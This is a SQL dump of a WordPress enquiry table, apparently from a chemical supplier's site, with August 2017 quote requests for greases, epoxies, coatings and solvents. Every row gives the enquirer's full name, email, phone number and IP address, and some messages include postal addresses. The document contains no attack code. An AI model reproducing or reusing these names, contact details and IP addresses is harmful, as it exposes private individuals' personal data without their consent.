INSERT INTO `wp_enquiry_detail_new` VALUES (1357, 'Erik Rogers', 'erikwrogers@gmail.com', 'Can I purchase this directly from MS? If so is there a certain quantity that needs to be purchased?  Is this also available in a retail store?\n Thank you,\nErik', '908-872-2412', 'Epoxy 907', '69.136.100.200', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-08 15:52:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1358, 'Molly Kalla', 'mkalla@viabiomedical.com', 'Interested in receiving a quote for your Nitinol Coatings', '7635779936', 'Nitinol Coatings', '75.146.165.249', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"4186";s:5:"title";s:35:"850G-100X Low-Bake Nitinol Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_572383276.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-08 16:45:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1359, 'David Einolf', 'david.einolf@canals.ny.gov', 'Sirs:\n\nPlease send me a copy of the SDS for MS-530N - Contact Re-Nu.\n\nThank you,\n\nDave', '', 'SDS for MS-530N', '148.144.10.214', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-08 18:04:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1360, 'Hal Weaver', 'hal.weaver@nasa.gov', 'Greetings,\n\nPlease provide a quote for one (1) 0.5 kg jar of Krytox GPL 203 grease.\n\nThank you!', '419-621-2219', 'Krypton Grease Quote', '139.88.50.157', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"784";s:5:"title";s:7:"GPL 203";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_295431182.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-08 19:30:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1361, 'David Moss', 'david.moss@betasouth.com', 'What sizes is this grease available in? I need pricing for 8oz plastic jars', '706-231-2318', 'Krytox 240ac grease', '71.203.73.173', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-08 21:06:52', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1362, 'Jennifer  Johnson', 'Jenjohnson@tycoint.com', 'MS-722 in a gallon size ', '704-296-3315', 'MS-722 quote', '207.235.72.190', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1706";s:5:"title";s:10:"MS-720/722";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-720.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-09 10:08:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1363, 'Tim Fair', 'timfair@eaton.com', 'What is the part number for the non-aerosol version of MS-122XD?  We are currently looking to continue using this product as a dry lubricant, but we need to move away from the aerosol spray.', '828-687-3219', 'MS-122XD Dry Lubricant', '192.104.67.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-09 11:33:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1364, 'Sean Knight', 'sean.knight@forces.gc.ca', 'Hello, I am looking for a few separate quotes, including shipping to Trenton Ontario Canada. For Krytox AC 240 MIL-G-27617, Type 3.  First quote would be for a 1kg Jar. Second for a .8 kg cartridge and the third for 5 tubes. \n\nthank you  for your time. ', '', 'Krytox', '131.137.245.208', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-09 12:42:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1365, 'Jean Claude ', 'jeanclaude.mbebnoun2@forces.gc.ca', 'Good day,\n\nCould you please give me the quote ,qty 5 ,thank you .\n\nJean Claude', '819-939-9094', 'QUOTE', '131.137.245.207', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-09 13:21:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1366, 'Javier Banuelos', 'javier@zeromasswater.com', 'I\\\'m looking for a quote for:\nQuart and a Gallon of MS-114D Conformal Coating Stripper\nThanks\n', '4802444136', 'Quote', '70.184.103.16', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"623";s:5:"title";s:36:"MS-114D | Conformal Coating Stripper";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-114C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-09 18:05:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1367, 'JOSE FELIX MARTELINO', 'martelino@almadion.com', 'Please Quote Ex-Works 12 cans', '', 'En -rust Inhibitor 12 Oz', '86.98.29.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1724";s:5:"title";s:25:"En-Rust™ Rust Inhibitor";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/rust-inhibitor.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 06:11:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1368, 'Gerritt Visser', 'gv.visser@hensoldt.net', 'Dear Sir / Madam\nI am Gerritt Visser from Hensoldt Optronics in South Africa.\nWe require a vapour degreasing solvent for our optical components, precision mechanical parts and electronic PCB assemblies in our production facility.\nCould you pleas give me an estimate of the cost per kg of Sion if bought in large drums.\nAre there any distributors in south Africa or do we need to import it ourselves.\nRegards\nGerritt Visser', '27126740155', 'Opteon Sion price and availability', '154.117.166.102', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 10:30:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1369, 'Sam Adas', 'sada@lle.rochester.edu', 'I am just looking for pricing for the 8 oz tube for this product when you get a chance please.\n\nThank you,\nSam', '5852754516', 'Pricing', '128.151.43.211', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"672";s:5:"title";s:6:"XHT-AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_340828220.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 11:58:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1370, 'Cindy Blair', 'purchasing@analogmodules.com', 'Quote 1 quart with certification', '321-527-3608', 'MS-472C  quart', '97.68.232.106', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"736";s:5:"title";s:7:"MS-472C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 12:20:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1371, 'Kayla Whiteside', 'KWHITESIDE@DJGRP.COM', 'needing to get pricing and avail sizes', '3167751212', 'EPIKURE3290', '70.164.201.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1198";s:5:"title";s:15:"EPIKURE™ 3290";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 13:12:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1372, 'Chris Kang', 'blissdeo@gmail.com', 'Would you give me the price.\nI want to buy 227 FG  Corrugator Grease  5 of them.\nand how to buy?  How long get them? \n ', '6263436592', 'buy products', '47.136.155.177', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2746";s:5:"title";s:24:"227 FG Corrugator Grease";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_373451461.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 16:50:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1373, 'Danny Via', 'dwv8f@virginia.edu', 'Please quote for 1 qt. Epon Resin 828', '4349246838', 'Request to order by credit card', '128.143.20.253', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 20:56:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1374, 'Perla Serna', 'pserna@prod-design.com', 'Can you please quote the following item:\n\n850G-102X Waterbased Fluoropolymer Coating', '9155323925', 'Quote ', '24.153.185.100', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"469";s:5:"title";s:42:"850G-102X Waterbased Fluoropolymer Coating";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:105:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-10 21:15:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1375, 'Ben Augir', 'bengt@twc.com', 'Hello, Can you quote prices for 1 each of the GPL 105 in 1 oz and 2 oz Dab-o-Matic.  Thanks.', '', 'RFQ - Krytox GPL 105', '74.139.147.197', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 01:57:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1376, 'Bill Costner', 'Bcostner@gbp.com', 'Looking for a price on this product, also for any options towards ordering a case. How big is a case? How much? Hope to here back from you. \n\nThanks', '9206098457', 'Pricing/bulk options', '12.34.169.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 15:54:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1377, 'Mario', 'm.arriaga@aerospaceengineeringcorp.com', 'Please give pricing for 1 can of your MS-122V PFE RELEASE AGENT DRY LUBRICANT', '714-729-1977', 'MS-122v Need Quote', '12.235.181.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 17:14:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1378, 'vernon', 'vernon@alliedfilters.com', 'need case quantity pricing', '4127412898', 'quote', '96.236.157.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 18:56:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1379, 'Kevin Golovin', 'kgolovin@hygratek.us', 'Hi, my name is Kevin Golovin and I am the Vice President of a small startup, HygraTek, out of Ann Arbor, MI. We are interested in trying out Vertrel XF for a new product line. If you could send us a small sample for initial product development, that would be most appreciated. Please feel free to contact me for any additional information. Please send samples to:\n\nKevin Golovin\n1600 Huron Parkway\nBuilding 520, Suite 2393\nAnn Arbor, MI 48109\n\nThanks!', '6072203473', 'Vertrel XF sample', '141.214.17.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 18:57:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1380, 'Nicholas Winters', 'nwinters@legacy-ind.com', 'I have 2 large spherical bearings that we are to coat in this grease for use. Could i please have a quote, and could someone contact me so i know how much i would need to purchase for my application. Thank you!', '2483911616', 'Krytox GPL 207', '96.66.35.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"814";s:5:"title";s:7:"GPL 207";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_230407642.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 19:11:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1381, 'Marta Hans', 'mhans@invocon.com', '•         Epoxy Chemicals - Epon 828 Resin\n•         Epoxy Chemicals - Epikure 3234 Hardener\n', '281-210-1839', 'Requesting a quote', '75.148.138.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 20:23:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1382, 'mike morris', 'mike@americanplasticfab.com', 'Please send me pricing for this along with curing agent Epicure 3140\n\nThank you', '434-376-3404', 'pricing', '76.5.74.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"842";s:5:"title";s:11:"EPON™ 825";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-11 20:39:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1383, 'Thijs de Vries', 'thijs.devries@aviocom.nl', 'Dear sir/madam,\n\nWe would like to receive a quotation for the Krytox 250 AC (2oz).\n\nMany thanks in advance.\n\nBest regards,\n\nThijs de Vries\nAviocom BV', '', 'Krytox 250 AC', '77.94.247.208', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"647";s:5:"title";s:5:"250AC";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_331929857.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-14 06:54:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1384, 'Gary Shirley', 'daltonair@windstream.net', 'I have been using this product and it works extremely well. I would like to  purchase 24 of the 15 oz. aerosol cans.\nThanks, Gary', '770-547-6624', 'MS-260 pricing', '71.29.156.53', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-14 14:38:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1385, 'Andrew Starritt', 'andrew@crestcoating.com', 'Hello,\n\nI work with Crest Coating, and we have an inquiry to coat a large quantity of washers with your MS-143-XD PTFE coating.  \n\nCan you please provide pricing and lead-time for 1 Gallon, 5 Gallon and 10 Gallon quantities?  Also, I did not see the theoretical coverage or recommended coating thickness listed on the datasheet.  Can you please provide the recommended thickness and theoretical coverage for one gallon?  \n\nThanks,\n\nAndrew Starritt\nCrest Coating', '714-563-7308', 'MS-143XD RFQ', '12.187.34.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:38:"MS-143XD | Dry Film Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-14 16:44:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1386, 'Ray Grosser', 'ray.grosser@windstream.net', 'I am building a large scale, 7-1/2 inch gauge, model train car and I use this epoxy to secure metal together such as roof ribs. \n\nThank you\n\nRay Grosser', '606-219-6768', 'Epoxy 907', '71.31.223.150', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-14 17:39:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1387, 'Gordon Lentzner', 'grlentzner@gmail.com', 'I have used Picrin for spot cleaning of fabrics for many years, but it is not sold in California any longer.  Is Sion a replacement for Picrin, and if so, can I purchase it and have it shipped to California', '562-972-2100', 'dry cleaning fluid to replace Picrin', '47.154.82.146', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-14 18:13:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1388, 'Jason Davis', 'jason.davis@dynetics.com', 'Hey,\n     Could you send me a quote for a gallon or so 826 with the appropriate amount of DEA for curing?  Also, how long would that take to get in hand.\n\nJason Davis', '256-603-2418', 'EPON 826 with DEA curing agent', '204.154.192.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-14 19:14:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1389, 'HIEU NGUYEN CAO', 'tdqanh@live.com', 'Dear whom concern\nI interested Kryptox XHT-BDX 1,5 grease. Could you quote for me this products with normal packed.\nBest regards\nHieu, Nguyen Cao\nANH TRADING LLC\n10226 BROOK road\nGLEN ALLEN - RICMOND VA 23059\nMobile: 804 - 874 - 5614\n', '8048745614', 'KRYPTOX XHT - BDX 1.5', '100.7.74.45', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"675";s:5:"title";s:6:"XHT-BD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_361063190.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 07:44:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1390, 'Roland Audette', 'roland.audette@materion.com', 'Please quote me qty= 1-12, 8oz tubes\n\nThank you,\nRoland Audette', '401-333-1700', 'Krytox LVP 8oz tube qty quote', '64.208.183.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"862";s:5:"title";s:10:"Krytox LVP";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_22381852.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 13:01:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1391, 'David Tucker', 'dtucker@precisioncoating.com', 'Good Morning,\nI am quoting a customer who wants parts coated with MS-143XD coating. Please provide sizes available, cost per size, lead/delivery time, and any other associated costs. Also provide an MSDS sheet for the material.\n\nThank you, Dave Tucker', '781-381-5703', 'MS-143XD quote', '50.225.212.82', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:38:"MS-143XD | Dry Film Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 13:48:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1392, 'Kristin Carlson', 'kcarlson@peerlessprecision.com', 'Good Afternoon,\n\nCould you please provide pricing and availability for:\n\n1 x Epoxy 907\n\nThank you!\nKristin Carlson\nPresident\nPeerless Precision, Inc.', '4135622359', 'Request for Quote', '70.91.140.97', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 17:20:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1393, 'Yuki Kamijo', 'kamijo@ualberta.ca', 'Hello. I am interested in the Krytox 157 FSH and I was wondering if you ship to Canada. We\\\'re located at the University of Alberta in Edmonton AB, Canada. \n\nI would like to know how much it would be for the needle nose bottle Krytox 1, 2 and 4 oz size. Thank you.', '', '', '142.244.5.60', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 19:17:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1394, 'Chauncey Fonville', 'cfonville1@comcast.net', 'Fact sheet and price ', '', '', '107.77.221.116', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"469";s:5:"title";s:42:"850G-102X Waterbased Fluoropolymer Coating";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:105:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-15 20:01:09', '', NULL, '', '', '', NULL, '', ''); 
